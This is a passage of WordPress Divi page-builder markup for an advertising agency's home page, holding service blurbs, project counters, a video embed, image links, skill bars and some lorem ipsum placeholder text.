header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Best-advertising-agency.png\" alt=\"Best Advertising Agency\" title_text=\"Best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" 